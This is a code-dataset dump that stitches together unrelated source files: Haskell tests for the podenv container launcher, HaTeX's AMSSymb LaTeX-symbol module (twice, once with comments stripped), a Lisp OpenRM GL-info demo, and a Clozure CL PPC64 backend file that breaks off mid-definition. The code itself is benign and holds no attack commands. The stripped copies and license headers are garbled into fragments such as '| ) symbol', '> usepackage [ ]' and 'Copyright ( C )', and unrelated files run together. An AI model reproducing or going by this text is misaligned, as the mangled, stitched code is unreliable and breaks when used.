Text.take 34 (Podenv.Runtime.showBuildInfo be (baseApp ^. arApplication . appRuntime)) `shouldBe` "# Containerfile localhost/3c922bca"
it "override nixpkgs when necessary" $ do
let mkApp installables' pin =
Podenv.Config.defaultApp (Podenv.Dhall.Nix (Podenv.Dhall.Flakes Nothing installables' pin))
& (appName .~ "test")
checkCommand test app expected = do
ctx <- runPrepare (Regular []) testEnv (defaultAppRes app)
(ctx ^. ctxCommand) `test` expected
commandShouldContain = checkCommand shouldContain
commandShouldNotContain = checkCommand shouldNotContain
mkApp ["nixpkgs#hello"] (Just "nixpkgs/42") `commandShouldContain` ["--override-input", "nixpkgs"]
mkApp ["nixpkgs/42#hello"] (Just "nixpkgs/42") `commandShouldNotContain` ["--override-input", "nixpkgs"]
mkApp ["nixpkgs/42#hello", "nixGL"] (Just "nixpkgs/42") `commandShouldContain` ["--override-input", "nixpkgs"]
describe "cli parser" $ do
it "pass command args" $ do
cli <- Podenv.Main.usage ["--name", "test", "image:ubi8", "ls", "-la"]
Podenv.Main.cliExtraArgs cli `shouldBe` ["ls", "-la"]
it "handle separator" $ do
cli <- Podenv.Main.usage ["--name", "test", "image:ubi8", "--", "ls", "-la"]
Podenv.Main.cliExtraArgs cli `shouldBe` ["ls", "-la"]
describe "cli with single config" $ do
it "select app" $ cliTest "env" [] "env"
it "add args" $ cliTest "env" ["ls"] "env // { command = [\"ls\"]}"
it "set cap" $ cliTest "env" ["--wayland"] (addCap "env" "wayland = True")
it "unset cap" $ cliTest (addCap "env" "wayland = True") ["--no-wayland"] "env"
it "set volume" $ cliTest "env" ["--volume", "/tmp/test"] "env // { volumes = [\"/tmp/test\"]}"
it "one args" $ cliTest "\\(a : Text) -> env // { description = Some a }" ["a"] "env // { description = Some \"a\"}"
it "two args" $
cliTest
"\\(a : Text) -> \\(b : Text) -> env // { description = Some (a ++ b) }"
["a", "b"]
"env // { description = Some \"ab\"}"
describe "nix test" $ do
it "nix run without args" $ nixTest "{ runtime.nix = \"test\"}" [] ["run", "test"]
it "nix run with args" $
nixTest
"{env, test = { runtime.nix = \"test\"}}"
["test", "--help"]
["run", "test", "--", "--help"]
it "nix run with shell" $
nixTest
"{env, test = { runtime.nix = \"test\", command = [\"cmd\"]}}"
["test", "--help"]
["shell", "test", "--command", "cmd", "--help"]
describe "podman ctx" $ do
let defRun xs = ["run", "--rm"] <> xs <> ["--label", "podenv.selector=unknown", defImg]
let podmanTest code expected = do
ar <- loadOne (addCap code "network = True, rw = True")
ctx <- runPrepare (Regular []) testEnv ar
Podenv.Runtime.podmanRunArgs defRe fg ctx (getImg ar) `shouldBe` expected
it "run simple" $ podmanTest "env" (defRun [])
it "run simple root" $
podmanTest
"env // { capabilities.root = True }"
(defRun ["--user", "0", "--workdir", "/root", "--env", "HOME=/root", "--volume", "/data/podenv-home:/root"])
it "run syscaps" $
podmanTest
"env // { syscaps = [\"NET_ADMIN\"] }"
(defRun ["--cap-add", "CAP_NET_ADMIN"])
it "run hostdir" $
podmanTest
"env // { volumes = [\"/tmp/test\"]}"
(defRun ["--security-opt", "label=disable", "--volume", "/tmp/test:/tmp/test"])
it "run volumes" $
podmanTest
"env // { volumes = [\"nix-store:/nix\"]}"
(defRun ["--volume", "/data/nix-store:/nix"])
it "run home volumes" $
podmanTest
"env // { volumes = [\"~/src:/data\"]}"
(defRun ["--security-opt", "label=disable", "--volume", "/home/user/src:/data"])
it "run many volumes" $
podmanTest
"env // { volumes = [\"/home/data:/tmp/data\", \"/tmp\", \"/home/old-data:/tmp/data\"]}"
(defRun ["--security-opt", "label=disable", "--volume", "/tmp:/tmp", "--volume", "/home/data:/tmp/data"])
where
defImg = "ubi8"
defRe = Podenv.Runtime.defaultGlobalEnv "/data"
runPrepare mode env app = runAppEnv env app $ Podenv.Capability.prepare mode
testEnv =
AppEnv
{ _envHostXdgRunDir = Just "/run/user/1000",
_envHostWaylandSocket = Just (SocketName "wayland-0"),
_envHostHomeDir = Just "/home/user",
_envHostCwd = "/usr/src/podenv",
_envHostUid = 1000,
_envAppHomeDir = Nothing,
_envHostDisplay = ":0",
_envHostSSHAgent = Nothing,
_envIsNVIDIAEnabled = pure False,
_envGetAppHomeDir = \app -> pure $ case app ^. Podenv.Dhall.appRuntime of
Podenv.Dhall.Nix _ -> Just "/home/user"
Podenv.Dhall.Container cb -> toString <$> cb ^. cbImage_home
_ -> Nothing,
_envGetVideoDevices = pure [],
_envGetCertLocation = pure $ Just "/etc/ca"
}
getImg app = case app ^. Podenv.Dhall.arApplication . Podenv.Dhall.appRuntime of
Podenv.Dhall.Image image -> ImageName image
_ -> error "Not podman"
fg = Foreground
getApp code args = do
cli <- Podenv.Main.usage args
cfg <- loadConfig' code
(app, mode, _, _) <- Podenv.Main.cliConfigLoad "/volumes" testEnv cfg cli
runPrepare mode (testEnv & envAppHomeDir ?~ "/home") app
cliTest :: Text -> [String] -> Text -> IO ()
cliTest gotCode args expectedCode = do
got <- getApp gotCode args
expected <- getApp expectedCode []
let removeSelector = ctxLabels .~ mempty
(got & removeSelector) `shouldBe` (expected & removeSelector)
nixTest code args expectedCommand = do
ctx <- getApp code args
drop 3 (ctx ^. ctxCommand) `shouldBe` expectedCommand
addCap code capCode =
"( " <> code <> " // { capabilities = (" <> code <> ").capabilities // {" <> capCode <> "}})"
mkConfig code =
unlines
[ "let Podenv = env:PODENV",
"let Nix = Podenv.Nix",
"let def = { capabilities = {=}, runtime = Podenv.Image \"ubi8\" }",
"let env = def in ",
code
]
loadConfig' code = Podenv.Config.loadConfig (Just . mkConfig $ code)
loadOne code = do
config' <- loadConfig' code
pure $ case Podenv.Config.unConfig config' of
[(_, Podenv.Config.LitApp x)] -> defaultAppRes (Podenv.Config.unRecord x)
_ -> error "Expected a single app"
|
84442848590c4f5f7c7b6133768f3257ba21080500da9a3cd8cd3e0ffc1ba784 | Daniel-Diaz/HaTeX | AMSSymb.hs |
-- | Module for the package @amssymb@.
module Text.LaTeX.Packages.AMSSymb
( -- * AMSSymb package
amssymb
-- * Arrows
, vartriangleleft, vartriangleright
, leftleftarrows, rightrightarrows
, rightleftarrows, leftrightarrows
, upuparrows, downdownarrows
, leftarrowtail, rightarrowtail
, curvearrowleft, curvearrowright
, twoheadleftarrow, twoheadrightarrow
, rightleftharpoons
, lsh2, rsh2
, leftarrow3, rightarrow3
, rightsquigarrow, leftrightsquigarrow
, looparrowleft, looparrowright
, circlearrowleft, circlearrowright
, upharpoonleft, upharpoonright
, downharpoonleft, downharpoonright
, nleftarrow, nrightarrow
, nleftarrow2, nrightarrow2
, nleftrightarrow, nleftrightarrow2
-- * Other
, lll, ggg
, gtrdot, lessdot
, square, blacksquare
, lozenge, blacklozenge
, checkmark, nexists
) where
import Text.LaTeX.Base.Class
import Text.LaTeX.Base.Types
-- | AMSSymb package.
-- Example:
--
-- > usepackage [] amssymb
amssymb :: ClassName
amssymb = "amssymb"
--
-- | \(\vartriangleleft\) symbol (open, left-pointing triangle).
vartriangleleft :: LaTeXC l => l
vartriangleleft = comm0 "vartriangleleft"
-- | \(\vartriangleright\) symbol (open, right-pointing triangle).
vartriangleright :: LaTeXC l => l
vartriangleright = comm0 "vartriangleright"
-- Arrow symbols from @amssymb@.  Each binding below simply emits, via
-- 'comm0', the LaTeX command of the same name as the quoted string.
-- | \(\leftleftarrows\) symbol - double left arrows.
leftleftarrows :: LaTeXC l => l
leftleftarrows = comm0 "leftleftarrows"
-- | \(\rightrightarrows\) symbol - double right arrows
rightrightarrows :: LaTeXC l => l
rightrightarrows = comm0 "rightrightarrows"
-- | \(\rightleftarrows\) symbol - right arrow atop a left arrow
rightleftarrows :: LaTeXC l => l
rightleftarrows = comm0 "rightleftarrows"
-- | \(\leftrightarrows\) symbol - left arrow atop a right arrow.
leftrightarrows :: LaTeXC l => l
leftrightarrows = comm0 "leftrightarrows"
-- | \(\upuparrows\) symbol - double upward arrows.
upuparrows :: LaTeXC l => l
upuparrows = comm0 "upuparrows"
-- | \(\downdownarrows\) symbol - double downward arrows.
downdownarrows :: LaTeXC l => l
downdownarrows = comm0 "downdownarrows"
-- | \(\lll\) symbol - triple less than.
lll :: LaTeXC l => l
lll = comm0 "lll"
-- | \(\ggg\) symbol - triple greater than.
ggg :: LaTeXC l => l
ggg = comm0 "ggg"
-- | \(\leftarrowtail\) symbol - leftwards "mapsto"
leftarrowtail :: LaTeXC l => l
leftarrowtail = comm0 "leftarrowtail"
-- | \(\rightarrowtail\) symbol - rightwards "mapsto"
rightarrowtail :: LaTeXC l => l
rightarrowtail = comm0 "rightarrowtail"
-- | \(\curvearrowleft\) symbol - leftwards curved arrow
curvearrowleft :: LaTeXC l => l
curvearrowleft = comm0 "curvearrowleft"
-- | \(\curvearrowright\) symbol - rightwards curved arrow
curvearrowright :: LaTeXC l => l
curvearrowright = comm0 "curvearrowright"
-- | \(\twoheadleftarrow\) symbol - double head left arrow
twoheadleftarrow :: LaTeXC l => l
twoheadleftarrow = comm0 "twoheadleftarrow"
-- | \(\twoheadrightarrow\) symbol - double head right arrow
twoheadrightarrow :: LaTeXC l => l
-- Fixed: previously emitted \twoheadleftarrow (copy/paste slip from the
-- definition above), so documents rendered a LEFT arrow here.
twoheadrightarrow = comm0 "twoheadrightarrow"
-- Miscellaneous @amssymb@ symbols (check mark, lozenges, dotted orders).
-- | \(\checkmark\) symbol.
checkmark :: LaTeXC l => l
checkmark = comm0 "checkmark"
-- | \(\lozenge\) symbol - narrow diamond
lozenge :: LaTeXC l => l
lozenge = comm0 "lozenge"
-- | \(\blacklozenge\) symbol - filled narrow diamond
blacklozenge :: LaTeXC l => l
blacklozenge = comm0 "blacklozenge"
-- | \(\nexists\) symbol - does not exist
nexists :: LaTeXC l => l
nexists = comm0 "nexists"
-- | \(\lessdot\) symbol - less than with inner dot
lessdot :: LaTeXC l => l
lessdot = comm0 "lessdot"
-- | \(\gtrdot\) symbol - greater than with inner dot
gtrdot :: LaTeXC l => l
gtrdot = comm0 "gtrdot"
-- | \(\square\) symbol - square.
-- For the QED “tombstone”, see 'Text.LaTeX.Packages.AMSThm.qed' instead; it is normally the
-- same symbol but gives the suitable text alignment.
square :: LaTeXC l => l
square = comm0 "square"
-- More @amssymb@ symbols; note that 'lsh2'\/'rsh2' and
-- 'leftarrow3'\/'rightarrow3' wrap the capitalised LaTeX commands
-- @\\Lsh@, @\\Rsh@, @\\Lleftarrow@ and @\\Rrightarrow@.
-- | \(\blacksquare\) symbol - a filled square
blacksquare :: LaTeXC l => l
blacksquare = comm0 "blacksquare"
-- | \(\rightleftharpoons\) symbol
rightleftharpoons :: LaTeXC l => l
rightleftharpoons = comm0 "rightleftharpoons"
-- | \(\Lsh\) symbol
lsh2 :: LaTeXC l => l
lsh2 = comm0 "Lsh"
-- | \(\Rsh\) symbol
rsh2 :: LaTeXC l => l
rsh2 = comm0 "Rsh"
-- | \(\Lleftarrow\) symbol
leftarrow3 :: LaTeXC l => l
leftarrow3 = comm0 "Lleftarrow"
-- | \(\Rrightarrow\) symbol
rightarrow3 :: LaTeXC l => l
rightarrow3 = comm0 "Rrightarrow"
-- | \(\rightsquigarrow\) symbol
rightsquigarrow :: LaTeXC l => l
rightsquigarrow = comm0 "rightsquigarrow"
-- | \(\leftrightsquigarrow\) symbol
leftrightsquigarrow :: LaTeXC l => l
leftrightsquigarrow = comm0 "leftrightsquigarrow"
-- | \(\looparrowleft\) symbol
looparrowleft :: LaTeXC l => l
looparrowleft = comm0 "looparrowleft"
-- | \(\looparrowright\) symbol
looparrowright :: LaTeXC l => l
looparrowright = comm0 "looparrowright"
-- Circular arrows and harpoon symbols from @amssymb@.
-- | \(\circlearrowleft\) symbol
circlearrowleft :: LaTeXC l => l
circlearrowleft = comm0 "circlearrowleft"
-- | \(\circlearrowright\) symbol
circlearrowright :: LaTeXC l => l
circlearrowright = comm0 "circlearrowright"
-- | \(\upharpoonleft\) symbol
upharpoonleft :: LaTeXC l => l
upharpoonleft = comm0 "upharpoonleft"
-- | \(\upharpoonright\) symbol
upharpoonright :: LaTeXC l => l
upharpoonright = comm0 "upharpoonright"
-- | \(\downharpoonleft\) symbol
downharpoonleft :: LaTeXC l => l
downharpoonleft = comm0 "downharpoonleft"
-- | \(\downharpoonright\) symbol
downharpoonright :: LaTeXC l => l
downharpoonright = comm0 "downharpoonright"
-- Negated (struck-through) arrows; the @2@-suffixed names wrap the
-- double-shafted capitalised LaTeX commands (@\\nLeftarrow@ etc.).
-- | \(\nleftarrow\) symbol
nleftarrow :: LaTeXC l => l
nleftarrow = comm0 "nleftarrow"
-- | \(\nrightarrow\) symbol
nrightarrow :: LaTeXC l => l
nrightarrow = comm0 "nrightarrow"
-- | \(\nLeftarrow\) symbol
nleftarrow2 :: LaTeXC l => l
nleftarrow2 = comm0 "nLeftarrow"
-- | \(\nRightarrow\) symbol
nrightarrow2 :: LaTeXC l => l
nrightarrow2 = comm0 "nRightarrow"
-- | \(\nleftrightarrow\) symbol
nleftrightarrow :: LaTeXC l => l
nleftrightarrow = comm0 "nleftrightarrow"
-- | \(\nLeftrightarrow\) symbol
nleftrightarrow2 :: LaTeXC l => l
nleftrightarrow2 = comm0 "nLeftrightarrow"
| null | https://raw.githubusercontent.com/Daniel-Diaz/HaTeX/aae193763157378500ebedc733c913e74f53b060/Text/LaTeX/Packages/AMSSymb.hs | haskell | | Module for the package @amssymb@.
* AMSSymb package
* Arrows
* Other
| AMSSymb package.
Example:
| \(\vartriangleleft\) symbol.
| \(\vartriangleleft\) symbol.
| \(\leftleftarrows\) symbol - double left arrows.
| \(\rightrightarrows\) symbol - double right arrows
| \(\rightleftarrows\) symbol - right arrow atop a left arrow
| \(\leftrightarrows\) symbol - left arrow atop a right arrow.
| \(\upuparrows\) symbol - double upward arrows.
| \(\downdownarrows\) symbol - double downward arrows.
| \(\lll\) symbol - triple less than.
| \(\ggg\) symbol - triple greater than.
| \(\leftarrowtail\) symbol - leftwards "mapsto"
| \(\rightarrowtail\) symbol - rightwards "mapsto"
| \(\curvearrowleft\) symbol - leftwards curved arrow
| \(\curvearrowright\) symbol - rightwards curved arrow
| \(\twoheadleftarrow\) symbol - double head left arrow
| \(\twoheadrightarrow\) symbol - double head right arrow
| \(\checkmark\) symbol.
| \(\lozenge\) symbol - narrow diamond
| \(\blacklozenge\) symbol - filled narrow diamond
| \(\nexists\) symbol - does not exist
| \(\lessdot\) symbol - less than with inner dot
| \(\gtrdot\) symbol - greater than with inner dot
| \(\square\) symbol - square.
same symbol but gives the suitable text alignment.
| \(\blacksquare\) symbol - a filled square
| \(\rightleftharpoons\) symbol
| \(\Lsh\) symbol
| \(\Rsh\) symbol
| \(\Lleftarrow\) symbol
| \(\Rrightarrow\) symbol
| \(\rightsquigarrow\) symbol
| \(\leftrightsquigarrow\) symbol
| \(\looparrowleft\) symbol
| \(\circlearrowleft\) symbol
| \(\circlearrowright\) symbol
| \(\upharpoonleft\) symbol
| \(\upharpoonright\) symbol
| \(\downharpoonleft\) symbol
| \(\nleftarrow\) symbol
| \(\nrightarrow\) symbol
| \(\nLeftarrow\) symbol
| \(\nRightarrow\) symbol
| \(\nleftrightarrow\) symbol
| \(\nLeftrightarrow\) symbol |
module Text.LaTeX.Packages.AMSSymb
amssymb
, vartriangleleft, vartriangleright
, leftleftarrows, rightrightarrows
, rightleftarrows, leftrightarrows
, upuparrows, downdownarrows
, leftarrowtail, rightarrowtail
, curvearrowleft, curvearrowright
, twoheadleftarrow, twoheadrightarrow
, rightleftharpoons
, lsh2, rsh2
, leftarrow3, rightarrow3
, rightsquigarrow, leftrightsquigarrow
, looparrowleft, looparrowright
, circlearrowleft, circlearrowright
, upharpoonleft, upharpoonright
, downharpoonleft, downharpoonright
, nleftarrow, nrightarrow
, nleftarrow2, nrightarrow2
, nleftrightarrow, nleftrightarrow2
, lll, ggg
, gtrdot, lessdot
, square, blacksquare
, lozenge, blacklozenge
, checkmark, nexists
) where
import Text.LaTeX.Base.Class
import Text.LaTeX.Base.Types
> usepackage [ ]
amssymb :: ClassName
amssymb = "amssymb"
vartriangleleft :: LaTeXC l => l
vartriangleleft = comm0 "vartriangleleft"
vartriangleright :: LaTeXC l => l
vartriangleright = comm0 "vartriangleright"
leftleftarrows :: LaTeXC l => l
leftleftarrows = comm0 "leftleftarrows"
rightrightarrows :: LaTeXC l => l
rightrightarrows = comm0 "rightrightarrows"
rightleftarrows :: LaTeXC l => l
rightleftarrows = comm0 "rightleftarrows"
leftrightarrows :: LaTeXC l => l
leftrightarrows = comm0 "leftrightarrows"
upuparrows :: LaTeXC l => l
upuparrows = comm0 "upuparrows"
downdownarrows :: LaTeXC l => l
downdownarrows = comm0 "downdownarrows"
lll :: LaTeXC l => l
lll = comm0 "lll"
ggg :: LaTeXC l => l
ggg = comm0 "ggg"
leftarrowtail :: LaTeXC l => l
leftarrowtail = comm0 "leftarrowtail"
rightarrowtail :: LaTeXC l => l
rightarrowtail = comm0 "rightarrowtail"
curvearrowleft :: LaTeXC l => l
curvearrowleft = comm0 "curvearrowleft"
curvearrowright :: LaTeXC l => l
curvearrowright = comm0 "curvearrowright"
twoheadleftarrow :: LaTeXC l => l
twoheadleftarrow = comm0 "twoheadleftarrow"
-- | \(\twoheadrightarrow\) symbol - double head right arrow
twoheadrightarrow :: LaTeXC l => l
-- Fixed: emitted \twoheadleftarrow (copy/paste slip) instead of the
-- identically-named right-arrow command.
twoheadrightarrow = comm0 "twoheadrightarrow"
checkmark :: LaTeXC l => l
checkmark = comm0 "checkmark"
lozenge :: LaTeXC l => l
lozenge = comm0 "lozenge"
blacklozenge :: LaTeXC l => l
blacklozenge = comm0 "blacklozenge"
nexists :: LaTeXC l => l
nexists = comm0 "nexists"
lessdot :: LaTeXC l => l
lessdot = comm0 "lessdot"
gtrdot :: LaTeXC l => l
gtrdot = comm0 "gtrdot"
For the QED “ tombstone ” , see ' Text.LaTeX.Packages.AMSThm.qed ' instead ; it is normally the
square :: LaTeXC l => l
square = comm0 "square"
blacksquare :: LaTeXC l => l
blacksquare = comm0 "blacksquare"
rightleftharpoons :: LaTeXC l => l
rightleftharpoons = comm0 "rightleftharpoons"
lsh2 :: LaTeXC l => l
lsh2 = comm0 "Lsh"
rsh2 :: LaTeXC l => l
rsh2 = comm0 "Rsh"
leftarrow3 :: LaTeXC l => l
leftarrow3 = comm0 "Lleftarrow"
rightarrow3 :: LaTeXC l => l
rightarrow3 = comm0 "Rrightarrow"
rightsquigarrow :: LaTeXC l => l
rightsquigarrow = comm0 "rightsquigarrow"
leftrightsquigarrow :: LaTeXC l => l
leftrightsquigarrow = comm0 "leftrightsquigarrow"
looparrowleft :: LaTeXC l => l
looparrowleft = comm0 "looparrowleft"
| ) symbol
looparrowright :: LaTeXC l => l
looparrowright = comm0 "looparrowright"
circlearrowleft :: LaTeXC l => l
circlearrowleft = comm0 "circlearrowleft"
circlearrowright :: LaTeXC l => l
circlearrowright = comm0 "circlearrowright"
upharpoonleft :: LaTeXC l => l
upharpoonleft = comm0 "upharpoonleft"
upharpoonright :: LaTeXC l => l
upharpoonright = comm0 "upharpoonright"
downharpoonleft :: LaTeXC l => l
downharpoonleft = comm0 "downharpoonleft"
| \(\downharpoonright\ ) symbol
downharpoonright :: LaTeXC l => l
downharpoonright = comm0 "downharpoonright"
nleftarrow :: LaTeXC l => l
nleftarrow = comm0 "nleftarrow"
nrightarrow :: LaTeXC l => l
nrightarrow = comm0 "nrightarrow"
nleftarrow2 :: LaTeXC l => l
nleftarrow2 = comm0 "nLeftarrow"
nrightarrow2 :: LaTeXC l => l
nrightarrow2 = comm0 "nRightarrow"
nleftrightarrow :: LaTeXC l => l
nleftrightarrow = comm0 "nleftrightarrow"
nleftrightarrow2 :: LaTeXC l => l
nleftrightarrow2 = comm0 "nLeftrightarrow"
|
2a0ee28d2856d4d5a7a876e9062466a25fe2a18ab63107a7c368eb2fcc2f5c45 | lispbuilder/lispbuilder | gl-info-sdl.lisp |
(in-package #:rm-examples)
(defun gl-info-sdl ()
  ;; Diagnostic demo: creates a 320x240 rm::sdl-window (presumably so a
  ;; current GL context exists before querying it -- confirm against
  ;; rm::sdl-window's initializer), prints the GL and GLU implementation
  ;; strings and extension lists to *standard-output*, then calls
  ;; rm::clean-up to tear everything down.
  (make-instance 'rm::sdl-window :width 320 :height 240)
  (format t "GL-VERSION: ~A~%" (rm::gl-version))
  (format t "GL-VENDOR: ~A~%" (rm::gl-vendor))
  (format t "GL-RENDERER: ~A~%" (rm::gl-renderer))
  (format t "GL-EXTENSIONS: ~%")
  (format t "==============~%")
  ;; ~{~a~%~} iterates the extension list, one entry per line.
  (format t "~{~a~%~}" (rm::gl-extensions))
  (format t "~%")
  (format t "GLU-VERSION: ~A~%" (rm::glu-version))
  (format t "GLU-EXTENSIONS: ~%")
  (format t "===============~%")
  (format t "~{~a~%~}" (rm::glu-extensions))
  (rm::clean-up))
| null | https://raw.githubusercontent.com/lispbuilder/lispbuilder/589b3c6d552bbec4b520f61388117d6c7b3de5ab/lispbuilder-openrm/examples/gl-info-sdl.lisp | lisp |
(in-package #:rm-examples)
(defun gl-info-sdl ()
(make-instance 'rm::sdl-window :width 320 :height 240)
(format t "GL-VERSION: ~A~%" (rm::gl-version))
(format t "GL-VENDOR: ~A~%" (rm::gl-vendor))
(format t "GL-RENDERER: ~A~%" (rm::gl-renderer))
(format t "GL-EXTENSIONS: ~%")
(format t "==============~%")
(format t "~{~a~%~}" (rm::gl-extensions))
(format t "~%")
(format t "GLU-VERSION: ~A~%" (rm::glu-version))
(format t "GLU-EXTENSIONS: ~%")
(format t "===============~%")
(format t "~{~a~%~}" (rm::glu-extensions))
(rm::clean-up))
| |
528a0e2b5c799c144c24514f6e6904670753b7a0f2a378446793c68d0894bbca | fukamachi/clozure-cl | ppc64-backend.lisp | -*- Mode : Lisp ; Package : CCL -*-
;;;
Copyright ( C ) 2009 Clozure Associates
Copyright ( C ) 2004 , 2005 Clozure Associates
This file is part of Clozure CL .
;;;
Clozure CL is licensed under the terms of the Lisp Lesser GNU Public
License , known as the LLGPL and distributed with Clozure CL as the
;;; file "LICENSE". The LLGPL consists of a preamble and the LGPL,
which is distributed with Clozure CL as the file " LGPL " . Where these
;;; conflict, the preamble takes precedence.
;;;
;;; Clozure CL is referenced in the preamble as the "LIBRARY."
;;;
;;; The LLGPL is also available online at
;;;
(in-package "CCL")
(eval-when (:compile-toplevel :load-toplevel :execute)
(require "BACKEND"))
(eval-when (:compile-toplevel :execute)
(require "NXENV")
(require "PPCENV"))
Callbacks . Both LinuxPPC64 and follow something
close to the PowerOpen ABI . LinuxPPC uses transition vectors
;;; and a TOC, but it's not clear that we need to care about that
;;; here.
(defun define-ppc64-poweropen-callback (name args body env)
(let* ((stack-word (gensym))
(stack-ptr (gensym))
(fp-arg-regs (gensym))
(fp-arg-num 0)
(arg-names ())
(arg-types ())
(return-type :void)
(args args)
(woi nil)
(monitor nil)
(dynamic-extent-names ())
(error-return nil))
(loop
(when (null args) (return))
(when (null (cdr args))
(setq return-type (car args))
(return))
(if (eq (car args) :without-interrupts)
(setq woi (cadr args) args (cddr args))
(if (eq (car args) :monitor-exception-ports)
(setq monitor (cadr args) args (cddr args))
(if (eq (car args) :error-return)
(setq error-return
(cadr args)
args (cddr args))
(progn
(push (foreign-type-to-representation-type (pop args)) arg-types)
(push (pop args) arg-names))))))
(setq arg-names (nreverse arg-names)
arg-types (nreverse arg-types))
(setq return-type (foreign-type-to-representation-type return-type))
(when (eq return-type :void)
(setq return-type nil))
(let* ((offset 0)
(need-stack-pointer (or arg-names return-type error-return))
(lets
(mapcar
#'(lambda (name type)
(let* ((delta 8)
(bias 0)
(use-fp-args nil))
(prog1
(list name
`(,
(if (typep type 'unsigned-byte)
(progn (setq delta (* 8 type)) '%inc-ptr)
(ecase type
(:single-float
(if (< (incf fp-arg-num) 14)
(progn
(setq use-fp-args t)
'%get-single-float-from-double-ptr)
(progn
(setq bias 4)
'%get-single-float)))
(:double-float
(setq delta 8)
(if (< (incf fp-arg-num) 14)
(setq use-fp-args t))
'%get-double-float)
(:signed-doubleword (setq delta 8) '%%get-signed-longlong)
(:signed-fullword
(setq bias 4)
'%get-signed-long)
(:signed-halfword (setq bias 6)
'%get-signed-word)
(:signed-byte (setq bias 7)
'%get-signed-byte)
(:unsigned-doubleword (setq delta 8) '%%get-unsigned-longlong)
(:unsigned-fullword
(setq bias 4)
'%get-unsigned-long)
(:unsigned-halfword
(setq bias 6)
'%get-unsigned-word)
(:unsigned-byte
(setq bias 7)
'%get-unsigned-byte)
(:address '%get-ptr)))
,(if use-fp-args fp-arg-regs stack-ptr)
,(if use-fp-args (* 8 (1- fp-arg-num))
`(+ ,offset ,bias))))
(when (or (eq type :address)
(typep type 'unsigned-byte))
(push name dynamic-extent-names))
(incf offset delta))))
arg-names arg-types)))
(multiple-value-bind (body decls doc) (parse-body body env t)
`(progn
(declaim (special ,name))
(define-callback-function
(nfunction ,name
(lambda (,stack-word)
(declare (ignorable ,stack-word))
(block ,name
(with-macptrs (,@(and need-stack-pointer (list `(,stack-ptr))))
,(when need-stack-pointer
`(%setf-macptr-to-object ,stack-ptr ,stack-word))
,(defcallback-body stack-ptr lets dynamic-extent-names
decls body return-type error-return
(- ppc64::c-frame.savelr ppc64::c-frame.param0)
fp-arg-regs
)))))
,doc
,woi
,monitor))))))
(defun defcallback-body-ppc64-poweropen (stack-ptr lets dynamic-extent-names decls body return-type error-return error-delta fp-arg-ptr)
(let* ((result (gensym))
(result-ptr (case return-type
((:single-float :double-float) fp-arg-ptr)
(t stack-ptr)))
(condition-name (if (atom error-return) 'error (car error-return)))
(error-return-function (if (atom error-return) error-return (cadr error-return)))
(body
`(with-macptrs ((,fp-arg-ptr (%get-ptr ,stack-ptr (- ppc64::c-frame.unused-1 ppc64::c-frame.param0))))
(declare (ignorable ,fp-arg-ptr))
(let ,lets
(declare (dynamic-extent ,@dynamic-extent-names))
,@decls
(let ((,result (progn ,@body)))
(declare (ignorable ,result))
,@(progn
;; Coerce SINGLE-FLOAT result to DOUBLE-FLOAT
(when (eq return-type :single-float)
(setq result `(float ,result 0.0d0)))
nil)
,(when return-type
`(setf (,
(case return-type
(:address '%get-ptr)
(:signed-doubleword '%%get-signed-longlong)
(:unsigned-doubleword '%%get-unsigned-longlong)
((:double-float :single-float) '%get-double-float)
(t '%%get-signed-longlong )) ,result-ptr 0) ,result)))))))
(if error-return
(let* ((cond (gensym)))
`(handler-case ,body
(,condition-name (,cond) (,error-return-function ,cond ,stack-ptr (%inc-ptr ,stack-ptr ,error-delta)))))
body)))
(defvar *ppc64-vinsn-templates* (make-hash-table :test #'eq))
(defvar *known-ppc64-backends* ())
#+linuxppc-target
(defvar *linuxppc64-backend*
(make-backend :lookup-opcode #'lookup-ppc-opcode
:lookup-macro #'ppc::ppc-macro-function
:lap-opcodes ppc::*ppc-opcodes*
:define-vinsn 'define-ppc-vinsn
:platform-syscall-mask (logior platform-os-linux platform-cpu-ppc)
:p2-dispatch *ppc2-specials*
:p2-vinsn-templates *ppc64-vinsn-templates*
:p2-template-hash-name '*ppc64-vinsn-templates*
:p2-compile 'ppc2-compile
:target-specific-features
'(:powerpc :ppc-target :poweropen-target :linux-target :linuxppc-target :ppc64-target :64-bit-target :big-endian-target)
:target-fasl-pathname (make-pathname :type "p64fsl")
:target-platform (logior platform-cpu-ppc
platform-os-linux
platform-word-size-64)
:target-os :linuxppc
:name :linuxppc64
:target-arch-name :ppc64
:target-foreign-type-data nil
:target-arch ppc64::*ppc64-target-arch*
:define-callback 'define-ppc64-poweropen-callback
:defcallback-body 'defcallback-body-ppc64-poweropen
))
#+darwinppc-target
(defvar *darwinppc64-backend*
(make-backend :lookup-opcode #'lookup-ppc-opcode
:lookup-macro #'ppc::ppc-macro-function
:lap-opcodes ppc::*ppc-opcodes*
:define-vinsn 'define-ppc-vinsn
:platform-syscall-mask (logior platform-os-darwin platform-cpu-ppc)
:p2-dispatch *ppc2-specials*
:p2-vinsn-templates *ppc64-vinsn-templates*
:p2-template-hash-name '*ppc64-vinsn-templates*
:p2-compile 'ppc2-compile
:target-specific-features
'(:powerpc :ppc-target :darwin-target :darwinppc-target :ppc64-target :64-bit-target :big-endian-target)
:target-fasl-pathname (make-pathname :type "d64fsl")
:target-platform (logior platform-cpu-ppc
platform-os-darwin
platform-word-size-64)
:target-os :darwinppc
:name :darwinppc64
:target-arch-name :ppc64
:target-foreign-type-data nil
:target-arch ppc64::*ppc64-target-arch*
:define-callback 'define-ppc64-poweropen-callback
:defcallback-body 'defcallback-body-ppc64-poweropen))
#+linuxppc-target
(pushnew *linuxppc64-backend* *known-ppc64-backends* :key #'backend-name)
#+darwinppc-target
(pushnew *darwinppc64-backend* *known-ppc64-backends* :key #'backend-name)
(defvar *ppc64-backend* (car *known-ppc64-backends*))
(defun fixup-ppc64-backend ()
(dolist (b *known-ppc64-backends*)
(setf (backend-lap-opcodes b) ppc::*ppc-opcodes*
(backend-p2-dispatch b) *ppc2-specials*
(backend-p2-vinsn-templates b) *ppc64-vinsn-templates*)
(or (backend-lap-macros b) (setf (backend-lap-macros b)
(make-hash-table :test #'equalp)))))
(fixup-ppc64-backend)
#+ppc64-target
(setq *host-backend* *ppc64-backend* *target-backend* *ppc64-backend*)
#-ppc64-target
(unless (backend-target-foreign-type-data *ppc64-backend*)
(let* ((ftd (make-ftd
:interface-db-directory
#+darwinppc-target "ccl:darwin-headers64;"
#+linuxppc-target "ccl:headers64;"
:interface-package-name
#+darwinppc-target "DARWIN64"
#+linuxppc-target "LINUX64"
:attributes
#+darwinppc-target
'(:signed-char t
:struct-by-value t
:struct-return-in-registers t
:struct-return-explicit t
:struct-by-value-by-field t
:prepend-underscores t
